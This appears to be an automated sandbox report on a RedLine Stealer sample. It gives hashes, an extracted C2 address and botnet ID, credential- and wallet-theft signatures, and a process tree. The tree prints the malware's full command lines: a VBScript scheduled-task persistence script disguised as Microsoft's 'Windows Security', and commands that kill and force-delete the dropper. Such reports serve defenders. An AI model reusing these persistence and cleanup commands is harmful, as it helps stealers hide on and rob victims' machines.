Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-20220310-en
  • submitted
    21-03-2022 15:40

General

  • Target

    18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe

  • Size

    102KB

  • MD5

    37bd9e1832978b6c5044fdc28694c765

  • SHA1

    a6840f04877701c607d8afa373ee6ec86a4a3975

  • SHA256

    18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973

  • SHA512

    d0e7972c9d67384ac59c76f763a1f8ab3fec921db68beee321cb91e47a35fafa789396baee10c8ade0d1585c450a2f4f5ce2a2b05d1b6466ee985bcfaced79e4

Malware Config

Extracted

Family

redline

Botnet

@JABKA9983

C2

65.108.82.103:15914

Attributes
  • auth_value

    3da459a4f4fcd6fe99288a78b3680c31

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and autofill data.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe
    "C:\Users\Admin\AppData\Local\Temp\18c13dae1f6ece30de48551703b4d96602eba3cd67bdf6c1d852069b217f2973.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Users\Admin\AppData\Local\Temp\build.exe
      "C:\Users\Admin\AppData\Local\Temp\build.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:912
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1440
        • C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3832
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c @echo off & echo const TriggerTypeLogon=9 : const ActionTypeExecutable=0 : const TASK_LOGON_INTERACTIVE_TOKEN=3 : const createOrUpdateTask=6 : Set service=CreateObject("Schedule.Service") : call service.Connect() : Dim rootFolder : Set rootFolder=service.GetFolder("") : Dim taskDefinition : Set taskDefinition=service.NewTask(0) : Dim regInfo : Set regInfo=taskDefinition.RegistrationInfo : regInfo.Author="Microsoft Corporation" : regInfo.Description="Windows Security is a software application that safeguards a system from malware. It was an anti-spyware program built to fight unauthorized access and protect Windows computers from unwanted software." : Dim settings : Set settings=taskDefinition.Settings : settings.StartWhenAvailable=True : settings.ExecutionTimeLimit="PT0S" : settings.AllowHardTerminate=False : settings.IdleSettings.StopOnIdleEnd=False : settings.DisallowStartIfOnBatteries=False : settings.StopIfGoingOnBatteries=False : Dim triggers : Set triggers=taskDefinition.Triggers : Dim trigger : Set trigger=triggers.Create(TriggerTypeLogon) : userId=CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERNAME%") : trigger.Id="LogonTriggerId" : trigger.UserId=userId : Dim Action : Set Action=taskDefinition.Actions.Create(ActionTypeExecutable) : Action.Path="C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe" : taskDefinition.Principal.UserId=userId : taskDefinition.Principal.LogonType=TASK_LOGON_INTERACTIVE_TOKEN : call rootFolder.RegisterTaskDefinition("Windows Security", taskDefinition, createOrUpdateTask, Empty, Empty, TASK_LOGON_INTERACTIVE_TOKEN) > C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs & cscript //nologo C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs & del C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs /f /q & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:192
            • C:\Windows\system32\cscript.exe
              cscript //nologo C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs
              6⤵
                PID:1888
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c powershell -command "$driverDesc = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.DriverDesc -ErrorAction SilentlyContinue).\"HardwareInformation.DriverDesc\"; $driverDesc" & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:680
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "$driverDesc = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.DriverDesc -ErrorAction SilentlyContinue).\"HardwareInformation.DriverDesc\"; $driverDesc"
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2916
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c powershell -command "$qwMemorySize = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.qwMemorySize -ErrorAction SilentlyContinue).\"HardwareInformation.qwMemorySize\"; [math]::round($qwMemorySize/1MB)" & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:816
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "$qwMemorySize = (Get-ItemProperty -Path \"HKLM:\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\0*\" -Name HardwareInformation.qwMemorySize -ErrorAction SilentlyContinue).\"HardwareInformation.qwMemorySize\"; [math]::round($qwMemorySize/1MB)"
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:516
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /F /PID 912 & powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\Admin\AppData\Local\Temp\build.exe') }).Terminate()" & timeout 3 > nul & del /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\build.exe" & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3220
          • C:\Windows\system32\taskkill.exe
            taskkill /F /PID 912
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4040
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\Admin\AppData\Local\Temp\build.exe') }).Terminate()"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3148
          • C:\Windows\system32\timeout.exe
            timeout 3
            4⤵
            • Delays execution with timeout.exe
            PID:1248

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Credential Access
    Credentials in Files (T1081): 2
  • Discovery
    Query Registry (T1012): 1
    System Information Discovery (T1082): 1
  • Collection
    Data from Local System (T1005): 2
  • Command and Control
    Web Service (T1102): 1

Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      MD5

      17286868c0a043ae5d2ff5798b6a3163

      SHA1

      b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401

      SHA256

      40321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6

      SHA512

      e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      9a3b058eeb3866979a8ae40c50afcad5

      SHA1

      5cb721e20622946ae015bb8f29fd731d9c722602

      SHA256

      a68952b9b61d0da3111b16a8572c35c16f06b95d33b0f7da73ef831584abb9da

      SHA512

      0c741adc8ab9e9a91429dbef62ced45a5887da080caae289a86e2b5f9a721733d8e0d000765fa826805d9288d9485ed42b3a7f0e87e042d142b0b6eeb41f6cec

    • C:\Users\Admin\AppData\Local\Temp\build.exe
      MD5

      d1db0a92a4c72b887cc16a32e9d285a8

      SHA1

      87d0c2dffc47615b70557399c8cf937f55599713

      SHA256

      95fc31e41a4134e57b2ebc1f31f0857dcf98ba3a0f78f0675e2c8c45c32bc19b

      SHA512

      31557170e2485584ace194d9337d073e73c18e42806edf796c1fef981301c6ae2748a1d72406545380e0b7f099c0cb4e4337b7d61673f825b49a3cbf1b87de71

    • C:\Users\Admin\AppData\Local\Temp\tmpCCB4.vbs
      MD5

      d40d18b617c382f94c2cf8f4ee7e9682

      SHA1

      7669d7e3b770f35be2a516ffacd481437eb93f3e

      SHA256

      5459eaee5107d59891a50f3d2b6d7eef0ac30216ae66e0e6a010f34c23d2f770

      SHA512

      22101058b8d14b320216e2f698f9f985e6f52e821c62c3fb9a09b9eb0d7537339676e11728ed978ac9191c032335d1d86c56b34065b9f22f85e43a9bdeaafbac

    • C:\Users\Admin\AppData\Roaming\Microsoft\Security\Windows Security.exe
      MD5

      d1db0a92a4c72b887cc16a32e9d285a8

      SHA1

      87d0c2dffc47615b70557399c8cf937f55599713

      SHA256

      95fc31e41a4134e57b2ebc1f31f0857dcf98ba3a0f78f0675e2c8c45c32bc19b

      SHA512

      31557170e2485584ace194d9337d073e73c18e42806edf796c1fef981301c6ae2748a1d72406545380e0b7f099c0cb4e4337b7d61673f825b49a3cbf1b87de71

    • memory/516-228-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmp
      Filesize

      9.9MB

    • memory/516-230-0x0000023DBD080000-0x0000023DBD082000-memory.dmp
      Filesize

      8KB

    • memory/516-232-0x0000023DBD083000-0x0000023DBD085000-memory.dmp
      Filesize

      8KB

    • memory/912-140-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmp
      Filesize

      9.9MB

    • memory/912-137-0x00000000005E0000-0x00000000005E6000-memory.dmp
      Filesize

      24KB

    • memory/912-136-0x00000000004A0000-0x00000000004E0000-memory.dmp
      Filesize

      256KB

    • memory/2552-128-0x0000000006650000-0x0000000006B4E000-memory.dmp
      Filesize

      5.0MB

    • memory/2552-127-0x0000000005A70000-0x0000000005B02000-memory.dmp
      Filesize

      584KB

    • memory/2552-132-0x0000000007300000-0x00000000074C2000-memory.dmp
      Filesize

      1.8MB

    • memory/2552-131-0x0000000006FE0000-0x0000000007030000-memory.dmp
      Filesize

      320KB

    • memory/2552-130-0x0000000006550000-0x00000000065B6000-memory.dmp
      Filesize

      408KB

    • memory/2552-129-0x0000000005B10000-0x0000000005B2E000-memory.dmp
      Filesize

      120KB

    • memory/2552-118-0x0000000000C50000-0x0000000000C70000-memory.dmp
      Filesize

      128KB

    • memory/2552-133-0x0000000007A00000-0x0000000007F2C000-memory.dmp
      Filesize

      5.2MB

    • memory/2552-126-0x0000000005950000-0x00000000059C6000-memory.dmp
      Filesize

      472KB

    • memory/2552-119-0x0000000073A50000-0x000000007413E000-memory.dmp
      Filesize

      6.9MB

    • memory/2552-120-0x0000000005B40000-0x0000000006146000-memory.dmp
      Filesize

      6.0MB

    • memory/2552-125-0x0000000005640000-0x000000000568B000-memory.dmp
      Filesize

      300KB

    • memory/2552-121-0x00000000055A0000-0x00000000055B2000-memory.dmp
      Filesize

      72KB

    • memory/2552-122-0x00000000056D0000-0x00000000057DA000-memory.dmp
      Filesize

      1.0MB

    • memory/2552-123-0x0000000005530000-0x0000000005B36000-memory.dmp
      Filesize

      6.0MB

    • memory/2552-124-0x0000000005600000-0x000000000563E000-memory.dmp
      Filesize

      248KB

    • memory/2916-187-0x0000019F7ACE0000-0x0000019F7ACE2000-memory.dmp
      Filesize

      8KB

    • memory/2916-186-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmp
      Filesize

      9.9MB

    • memory/2916-188-0x0000019F7ACE3000-0x0000019F7ACE5000-memory.dmp
      Filesize

      8KB

    • memory/3148-160-0x000002186CDF3000-0x000002186CDF5000-memory.dmp
      Filesize

      8KB

    • memory/3148-158-0x000002186CDF0000-0x000002186CDF2000-memory.dmp
      Filesize

      8KB

    • memory/3148-156-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmp
      Filesize

      9.9MB

    • memory/3148-153-0x000002186F0B0000-0x000002186F126000-memory.dmp
      Filesize

      472KB

    • memory/3148-149-0x000002186CDC0000-0x000002186CDE2000-memory.dmp
      Filesize

      136KB

    • memory/3832-185-0x0000000003370000-0x000000001B370000-memory.dmp
      Filesize

      384.0MB

    • memory/3832-142-0x000000001BDB0000-0x000000001BDB2000-memory.dmp
      Filesize

      8KB

    • memory/3832-141-0x00007FFCF0290000-0x00007FFCF0C7C000-memory.dmp
      Filesize

      9.9MB